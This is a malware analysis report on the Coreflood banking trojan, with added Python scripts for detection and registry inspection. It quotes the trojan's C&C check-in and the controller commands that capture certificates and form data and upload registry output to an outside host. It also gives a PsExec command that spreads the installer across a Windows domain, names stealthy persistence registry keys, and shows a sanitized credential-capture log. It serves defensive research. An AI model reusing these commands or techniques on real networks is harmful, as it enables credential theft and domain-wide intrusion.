Coreflood/AFcore Trojan Analysis
- URL: http://www.secureworks.com/research/threats/coreflood
- Date: June 30, 2008
- Author: Joe Stewart, Director of Malware Research, SecureWorks
Highlights
- One of the oldest botnets in continuous operation (+6 years)
- Motive shifted from DDoS, to selling anonymity services, to full-fledged bank fraud
- Entire Windows domains infected at once (thousands of computers at some organizations)
- Over 378,000 computers infected during 16-month time frame
- Infected businesses, hospitals, government organizations, and even a state police agency
In the past several years we've seen many botnets come and have even seen some go. Some die because they are replaced by other code, some die (not often enough) because their owners go to jail. During this time, we've seen one botnet which has quietly flown under the radar since at least 2002. Coreflood (or "AF", as the author has dubbed it) started out as an internet relay chat (IRC) bot used for attacking other IRC users. Over time however, it evolved into a TCP proxy as part of an anonymity service, and then later into a full-fledged infostealer trojan. We wrote about the proxy component when it was first developed in 2003. Since that time Coreflood has maintained a much lower profile while other more prolific botnets came to the forefront of public attention. However, just recently the group behind Coreflood has escalated their activity and the trojan is beginning to be noticed again.
SecureWorks already had countermeasures in place for its clients to protect against the Coreflood Trojan and its variants and immediately notified research partners, anti-virus vendors and law enforcement officials upon discovering the scam.
Coreflood is very recognizable if you've ever unpacked its code in a debugger - there are dozens of programmer-inserted debug strings in the trojan, which is quite unusual to see in malware. For instance, some of the strings found inside the unpacked binary:
Allocated new DLL path %s (pid: %d)
Registry key cannot be opened (%w)
Registry value will be reset in %d milliseconds
Setting registry notification handler . . .(%w)
Loaded DLL path %s from OCTOPUS_SHARED (pid: %d)
Stored DLL path %s stored into OCTOPUS_SHARED (pid: %d)
Loaded basename %s from DLL path %s (pid: %d)
Saving registry value %s (trailing characters %d and %d, length %d)
called check_registry with remove=1
comparing %s (%d) against %s (%d)
Socket cannot be allocated (%w) for %s+%h
Socket used by %s+%h cannot be deallocated (%w)
Requested amount of memory cannot be allocated (%E) for %s+%h
Memory block used by %s+%h cannot be reallocated (%E)
Memory block used by %s+%h cannot be deallocated (%E)
Looking up %s . . .
Resolved %s to %s; aliases: %s; addresses: %s
AF statistics:
Usage level of Windows Sockets: %d, peak: %d (errors: %d)
Allocated %d bytes in %d memory blocks (errors: %d)
No timers have been scheduled
Total %d timers have been scheduled. Time left:
%dwd %t - scheduled for %s+%h
No objects are being watched
Total %d objects are being watched. Handles:
%h - watched by %s+%h
Total bytes transmitted: %d, received: %d. End of AF statistics
It is clear that Coreflood is viewed by its author more like a corporate software project than a simple backdoor trojan. Fortunately, having seen some of these same strings years before, when we came across a new variant of the trojan recently, we were able to recognize it. Upon analysis however, we discovered the botnet was receiving commands related to banking sites, which is usually an indicator of infostealer/fraud activity.
To elaborate, here is a typical HTTP POST from Coreflood, checking in with its command-and-control server (C&C):
POST /c/a HTTP/1.0
Host: joy4host.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close
r=667&i=&v=3112&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=797&k=125&m=1432187&
panic=0&ie=237&input=237&c=United States&l=ENU
In response, the controller sends back a set of commands:
del ID; addto ID 3192784r667; setstr ID +S
http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\;
Windows NT 5.1)" http #hosts +b "http #hosts +up /c/a usr=\\E\\u\\
E&wg=\\E\\vUSERDOMAIN=\\E&cn=\\E\\H\\E&i=3192784&v=3112&os=\\E\\O\\
E&s=\\E\\p\\E&h=\\E\\h\\E&d=\\d&b=\\b&u=\\Z&k=\\K&m=\\M&panic=\\
qpanic$&ie=\\qie$&input=\\qinput$&c=\\c&l=\\l"
http #hosts +I 180000
delfrom #hosts dreadent.info;addto $perform delfrom #hosts dreadent.info;setstr $perform +S
addto $perform log ie +Sm 6;addto $perform log other -Sm;addto $perform log input +S;setstr $perform +S
addto $perform setwnd 3 * *.pfx * +OM 4;addto $perform setwnd 4 * *.p12 * +OM 4;setstr $perform +S
setwnd 0 *https*example.com* * * +urfPMSW 4096 4 200000
addto $perform setwnd 8 * * * +pwclCME 60 1;addto $perform set +H;setstr $perform +S
setwnd 17 https://* * * +urfPMWK 4096 2
setwnd 18 * https://* * +urfPMWK 4096 2
http #hosts +I 600000
del upload_regorg;del regorg1;addto upload_regorg http +antrexhost.com:80 +LAWhuf 300000
antrexhost.com /c/upload?file=regorg.txt&id=3192784 \\tregorg351.tmp;exec +regorg1
-L+ac "\vcomspec= /c reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\"
/v RegisteredOrganization | findstr RegisteredOrganization > \tregorg351.tmp
2> \tregorg352.tmp" "perfrm upload_regorg"
There are several instructions in the command reply. First, a unique ID (3192784r667) is assigned to the bot, which it will use from this point on. A connectivity test against www.microsoft.com is requested, followed by a format string that tells the bot where its future C&C requests should be sent (the /c/a path on the hosts in the #hosts list) and which variables to include; note that, compared with the first check-in, the reply adds a usr field and a wg field built from the USERDOMAIN environment variable, among others. Next, the bot is instructed on what kinds of data to steal - in this case, data will be stored for "ie", "other" and "input". In addition, the bot is instructed to search for certain file types, namely *.pfx and *.p12 files - certificate files, which might be used for online banking. Any data sent to https sites will be logged, and example.com in particular is given its own window identifier (0 in the setwnd commands above) so that its captures can be retrieved separately later. Finally, the controller asks the bot to read the RegisteredOrganization value from HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion with reg query, capture the output to a temporary file and upload it to antrexhost.com. It seems the group behind Coreflood is very interested in what company owns the computer they have managed to infect.
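The following Python is an added example, not code from the article, from SecureWorks or from the trojan itself. It shows how a network defender would recognise the check-in above and take apart a controller reply: the beacon is matched on its path, content type and full field set (all taken from the capture above), and the reply is split into commands while honouring the backslash-escaped semicolons inside the quoted User-Agent string. The two sample messages are constructed from the lines above; the assumption that the three fields after a setwnd window id are match patterns is mine, since the page shows the slots but does not name them.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample: the check-in above, re-assembled as one request
# (same path, headers and body; the body is exactly 115 bytes).
SAMPLE_CHECKIN = (
    "POST /c/a HTTP/1.0\r\n"
    "Host: joy4host.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 115\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Connection: close\r\n"
    "\r\n"
    "r=667&i=&v=3112&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=797&k=125&m=1432187&"
    "panic=0&ie=237&input=237&c=United States&l=ENU"
)

# Constructed sample: five lines taken from the controller reply above.
SAMPLE_REPLY = "\n".join([
    "del ID; addto ID 3192784r667; setstr ID +S",
    'http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\\; MSIE 6.0\\; Windows NT 5.1)"',
    "addto $perform setwnd 3 * *.pfx * +OM 4;addto $perform setwnd 4 * *.p12 * +OM 4;setstr $perform +S",
    "setwnd 0 *https*example.com* * * +urfPMSW 4096 4 200000",
    "setwnd 17 https://* * * +urfPMWK 4096 2",
])

# Every field name carried by the check-in body above.
CHECKIN_FIELDS = {"r", "i", "v", "os", "s", "h", "d", "b", "u", "k", "m",
                  "panic", "ie", "input", "c", "l"}


def parse_http_request(raw):
    """Minimal HTTP/1.0 request parser: (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify_checkin(raw):
    """Return the beacon's fields if the request has the Coreflood check-in
    shape (POST to /c/a, form-encoded, full field set), otherwise None."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or not path.endswith("/c/a"):
        return None
    if "x-www-form-urlencoded" not in headers.get("content-type", ""):
        return None
    fields = dict(parse_qsl(body, keep_blank_values=True))
    # Demand the whole field set; a few of these names are common elsewhere.
    if not CHECKIN_FIELDS <= set(fields):
        return None
    return fields


def split_commands(reply):
    """Split a controller reply into commands. Newlines and ';' separate
    commands, but a ';' that is backslash-escaped or inside double quotes
    (as in the quoted User-Agent string above) does not."""
    commands = []
    for line in reply.splitlines():
        current, in_quote, i = [], False, 0
        while i < len(line):
            ch = line[i]
            if ch == "\\" and i + 1 < len(line):      # keep escape pairs intact
                current.append(line[i:i + 2])
                i += 2
                continue
            if ch == '"':
                in_quote = not in_quote
            if ch == ";" and not in_quote:
                commands.append("".join(current))
                current = []
            else:
                current.append(ch)
            i += 1
        commands.append("".join(current))
    return [re.sub(r"\s+", " ", c).strip() for c in commands if c.strip()]


def watched_patterns(commands):
    """Collect the wildcard patterns from setwnd commands. Assumption: the
    three fields after the window id are match patterns and a lone '*'
    means 'any' (the page shows the slots but does not name them)."""
    patterns = set()
    for cmd in commands:
        tokens = cmd.split(" ")
        if "setwnd" not in tokens:
            continue
        idx = tokens.index("setwnd")
        for slot in tokens[idx + 2:idx + 5]:
            if slot != "*":
                patterns.add(slot)
    return patterns


if __name__ == "__main__":
    print(classify_checkin(SAMPLE_CHECKIN))
    for cmd in split_commands(SAMPLE_REPLY):
        print(cmd)
    print(watched_patterns(split_commands(SAMPLE_REPLY)))
```

Run against the samples, classify_checkin returns the sixteen beacon fields, split_commands yields nine commands with the User-Agent string kept whole, and watched_patterns returns the certificate-file and https patterns the controller asked the bot to watch. On real proxy logs the same field-set check is a tighter signature than the path alone, since /c/a and the MSIE 6.0 User-Agent are both easy to collide with.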
With the help of Spamhaus we were able to get cooperation from one of the hosting companies where a Coreflood variant's C&C was hosted, to provide us with the back-end source code and any information about just how Coreflood was managing to infect computers. Quite unexpectedly we found all that, plus over 50 gigabytes of compressed data, stolen from hundreds of thousands of computers over the past two years. To top it off, the botnet uses a MySQL database to track all infected computers - giving us a statistical goldmine of data. Logged in the database were 378,758 unique bot IDs over a period of 16 months. Since the database tracks the initial infection timestamp along with the timestamp of each bot's last check-in, we were able to determine that the average lifespan of a Coreflood bot is 66 days.
Another thing we noticed in the database is that unusually large numbers of computers were infected in some companies. Since the database stores the date and time of infection and the last check-in time of each bot, it was possible to graph the infections over time. The results were quite startling - almost every organization we looked at had dramatic infection "events", where sometimes hundreds or thousands of computers were infected on the same day. This is inconsistent with what one usually sees when dealing with trojans, which have no way of spreading on their own. Historically, Coreflood has been spread via web exploit, which would not explain such massive infections inside a single company (unless their intranet web server had been used to host browser exploit code, which we entertained as one possibility).
Here are some of the graphs of the infections at different organizations over time:
[Graphs omitted in this copy: infection counts over time at several affected organizations.]
Many more organizations were affected this way, including hospitals, universities and businesses. Eventually with the help of some of the network administrators we were able to piece together what had happened to cause these outbreaks. It works in the following manner:
- First-stage trojan bot (not Coreflood) is installed via driveby browser exploit (NCT Audiofile2 ActiveX control)
- Bot is instructed to download a copy of the Coreflood installer (here named ie1823en.exe, also we have seen wmedia106.exe) and another file, psexec.exe (or ps2exec.exe or ps3exec.exe) to the temporary directory.
- Bot is instructed to execute the following command in Windows:
cmd /c $TMPDIR\ps2exec.exe \\* $TMPDIR\ie1823en.exe
PsExec is a legitimate Windows administration tool, which can be downloaded from Microsoft as part of the PsTools package developed by Sysinternals' Mark Russinovich. The \\* target tells PsExec to run the given program on every computer in the current domain, and the remote processes run with the credentials of whoever launched PsExec. So if the infected user has domain administrator privileges, the ie1823en.exe file is executed on every computer in the domain, infecting them with Coreflood.
The first-stage trojan installs itself to the windows\system32 directory and uses the registry key
software\Microsoft\Active Setup\Installed Components\{random alpha-only GUID}
in order to ensure that the trojan is run the first time each user logs on to the machine (Active Setup runs a component's StubPath once per user, recording under HKCU which components have already run). This is useful because it means the trojan doesn't necessarily have to infect a domain administrator's workstation: it can infect any computer in the domain and wait until an administrator logs in to fix some problem on that workstation, then run with his/her privileges and spread to the rest of the computers on the network.
Coreflood itself has a unique method of startup - it uses the registry key
software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers
This key is not well-known as a startup method and is not always checked by anti-malware scanners. Each subkey's default value is a CLSID; when Windows Explorer or Internet Explorer starts, it reads this key and loads the in-process server DLL registered for that CLSID under HKCR\CLSID\{CLSID}\InprocServer32 into the process and initializes it. For malware, this is similar to using a browser helper object (BHO) but without touching the well-known BHO registry keys, so a scanner that only enumerates BHOs and Run keys will not see it.
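As an added example (not from the article or from SecureWorks), the Python below inventories both persistence locations just described, the Active Setup Installed Components key of the first-stage bot and the ShellIconOverlayIdentifiers key used by Coreflood, from a `reg export` file rather than the live registry, so a responder can review a suspect machine offline. It resolves each overlay identifier to the DLL its CLSID loads, and flags Active Setup components whose name is shaped like a GUID but is not hexadecimal, which is the "random alpha-only GUID" the article describes. The export text, GUIDs and DLL names in the sample are constructed for the example; only the key locations come from the page.

```python
import re

# Constructed sample of what `reg export` writes for the keys discussed above
# plus the CLSID entries they point to. GUIDs and file names are invented.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SyncOverlay]
@="{6F5E4D3C-2B1A-4F9E-8D7C-0A1B2C3D4E5F}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\zq]
@="{A1B2C3D4-E5F6-4A7B-8C9D-0E1F2A3B4C5D}"

[HKEY_CLASSES_ROOT\CLSID\{6F5E4D3C-2B1A-4F9E-8D7C-0A1B2C3D4E5F}\InprocServer32]
@="C:\\Program Files\\SyncTool\\overlay.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{A1B2C3D4-E5F6-4A7B-8C9D-0E1F2A3B4C5D}\InprocServer32]
@="C:\\WINDOWS\\system32\\unknown_overlay.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
"StubPath"="regsvr32.exe /s /n /i:U shell32.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{QXKJWPLD-ZMRT-HBNV-CGFY-TLWKPSQDRMXB}]
"StubPath"="C:\\WINDOWS\\system32\\stage1_sample.exe"
"""

OVERLAY_KEY = "\\explorer\\shelliconoverlayidentifiers\\"
ACTIVE_SETUP_KEY = "\\active setup\\installed components\\"
GUID_SHAPE = re.compile(r"^\{[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12}\}$", re.I)
HEX_GUID = re.compile(r"^\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}$", re.I)
VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def parse_reg_export(text):
    """Parse the subset of .reg syntax that `reg export` produces for these
    keys: [key] headers, @="default" and "name"="string" values.
    Returns {key path: {value name: value}}; non-string values are kept raw."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = VALUE_LINE.match(line)
        if not m or current is None:
            continue
        name = "(default)" if m.group(1) == "@" else m.group(1)[1:-1]
        raw = m.group(2)
        if raw.startswith('"') and raw.endswith('"'):
            # reg export doubles backslashes and escapes quotes in strings
            raw = raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        keys[current][name] = raw
    return keys


def entries_under(keys, suffix):
    """Yield (entry name, values) for the direct subkeys of any key whose
    path ends with `suffix` (compared case-insensitively)."""
    for path, values in keys.items():
        parent, _, entry = path.rpartition("\\")
        if (parent + "\\").lower().endswith(suffix):
            yield entry, values


def overlay_handlers(keys):
    """Map each ShellIconOverlayIdentifiers entry to (CLSID, DLL), where DLL
    is the CLSID's InprocServer32 default value or None if unregistered."""
    clsid_to_dll = {}
    for path, values in keys.items():
        m = re.search(r"\\clsid\\(\{[^}]+\})\\inprocserver32$", path, re.I)
        if m:
            clsid_to_dll[m.group(1).upper()] = values.get("(default)")
    result = {}
    for entry, values in entries_under(keys, OVERLAY_KEY):
        clsid = values.get("(default)", "").upper()
        result[entry] = (clsid, clsid_to_dll.get(clsid))
    return result


def active_setup_anomalies(keys):
    """Active Setup components whose name looks like a GUID but contains
    letters beyond F, i.e. the random alpha-only GUID the page describes."""
    return [(entry, values.get("StubPath"))
            for entry, values in entries_under(keys, ACTIVE_SETUP_KEY)
            if GUID_SHAPE.match(entry) and not HEX_GUID.match(entry)]


if __name__ == "__main__":
    parsed = parse_reg_export(SAMPLE_EXPORT)
    for entry, (clsid, dll) in overlay_handlers(parsed).items():
        print(f"overlay {entry!r}: {clsid} -> {dll}")
    for entry, stub in active_setup_anomalies(parsed):
        print(f"suspicious Active Setup entry {entry}: {stub}")
```

To feed it a real machine, export the ShellIconOverlayIdentifiers and Active Setup keys from HKLM and the CLSID subtree from both HKLM\SOFTWARE\Classes and HKCU\Software\Classes (the per-user hive takes precedence when HKCR is merged), concatenate the files and pass the text to parse_reg_export; reg export writes UTF-16, so open the files with encoding="utf-16". The overlay inventory is meant for review rather than automatic verdicts, since legitimate sync clients register overlay handlers too; the alpha-only GUID check, by contrast, has no benign match.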
By being able to infect an entire Windows domain at once, the potential for corporate espionage seems limitless. In addition, some of the infected organizations are law enforcement entities - criminal investigations could even be compromised. Currently, however, the Coreflood group appears to be focused on collecting banking information, because much of the stolen data was compiled into directories with familiar bank names. But should the criminals behind the operation discover there is money to be made in possessing credentials to other websites, they need only pull those credentials from the reams of collected data. Here is a sanitized excerpt of some of the data stolen from one user:
2007-11-05 22:14:29 Browser event: URL at 15 -> https://ts. example.com/
The following error was encountered:
.com/xxx/TS/index
.php
2007-11-05 22:14:35 Browser event: requested URL at 15 -> https://ts. example.com/
xxx/TS/login.php
2007-11-05 22:14:35 Browser event: content at 15 (276 bytes):
Your session has expired, please login again.
User Type:Manager
Employee
Username:
Password:
Submit
©2005Example, Inc. All Rights Reserved. Privacy Legal Contact Us PHP counter SOAP counters
2007-11-05 22:14:35 Browser event: cookie at 15 -> ARPT=xxx; PHPSESSID=xxx
2007-11-05 22:14:35 Browser event: input type at 15 -> radio
2007-11-05 22:14:35 Browser event: input name at 15 -> loginusertype
2007-11-05 22:14:35 Browser event: input value at 15 -> 0
2007-11-05 22:14:35 Browser event: input type=text at 15
2007-11-05 22:14:43 Browser event: input name at 15 -> username
2007-11-05 22:14:43 Browser event: input value at 15 -> xxx
2007-11-05 22:14:47 Browser event: input type=password at 15
2007-11-05 22:14:48 Browser event: input name at 15 -> password
2007-11-05 22:14:48 Browser event: input value at 15 -> xxx
2007-11-05 22:14:48 Browser event: URL at 15 -> -> https://ts. example.com/
/xxx/TS/login.php
2007-11-05 22:14:48 Browser event: requested URL at 15 -> https://ts.example.com/xxx/TS/login.php
2007-11-05 22:14:48 Browser event: post at 15 ->Submit=Submit&loginusertype=0&username=xxx&password=xxx
From this example, we can see that the trojan captures not only usernames and passwords but also the text content of the page at the same time. This would allow the criminal to find credentials that he/she may not even have realized were valuable, and it gives a quick way to gauge the value of a set of credentials, for instance by capturing the bank account balance displayed to the infected user. Not having to log in to each account to determine its balance can be a huge time saver for a criminal. Although it would take a great deal of time to determine just how much money the Coreflood group has illicit access to, based on numbers seen in the database it is easily in the millions of dollars.
Removing Coreflood manually is possible by removing its entries under the registry keys above; however, it can be complicated in a Windows domain environment, because the act of logging in to clean a workstation may itself infect other systems on the network. Care should be taken to block network traffic to the controller before using domain administrator credentials to clean up the problem. At present, the known controller domains are mcupdate.net, joy4host.com and antrexhost.com.
Mitigating the problem of malware using domain administrator credentials is harder – it is not really possible to disable this feature without removing the ability of authorized users to remotely administer workstations entirely (including the ability to push needed updates to all computers in the domain). Malware using valid credentials to spread on a Windows network has been a problem for quite some time, however, in the past it usually meant brute-forcing of weak passwords. Malware authors have now realized that they only need to infect a computer that a domain administrator will use at some point. We've heard of cases of at least one other unrelated trojan using this method to propagate, so we expect to find increasing use of this technique in the future. It falls upon the domain administrator to be aware of this tactic and be increasingly aware of the security of not only his/her workstation, but any workstation accessed with administrator credentials.